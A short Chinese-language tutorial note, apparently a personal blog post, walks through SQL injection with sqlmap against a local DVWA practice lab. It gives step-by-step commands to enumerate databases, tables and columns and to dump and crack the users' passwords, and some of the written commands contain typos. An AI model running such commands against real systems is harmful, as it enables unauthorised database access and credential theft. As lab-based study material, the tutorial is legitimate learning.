SQLmap注入练习——dvwa
记录一下自己学习的知识点
最近自己一直在学习使用kali,今天我就用kali中的sqlmap演示一下sql注入
我就从dvwa的low级别开始演示,其实同样的操作在medium和high级别也同样能够实现注入
GET提交参数
通过表单或者F12 观察网络模块,我们可以发现dvwa的low级别是GET提交参数,当然也可以通过burpsuite截断来观察。
提取cookie
因为dvwa需要登录后才能提交参数,所以我们要通过cookie来跑sqlmap,直接F12提取cookie
爆数据库名
sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" --dbs
如图得到数据库名字
爆表名
因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名
sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --tables
如图得到dvwa中的表名
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名
爆列名
sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users --columns
得到列名如下,我们感兴趣的是user和password
爆账号和密码
接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密
sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users -C user,password --dump
最终得到账号和密码,达到目的
以上过程就是用sqlmap自动注入的过程,自己可以多练练,至于medium和high级别的道理是一样的,最好自己去尝试一下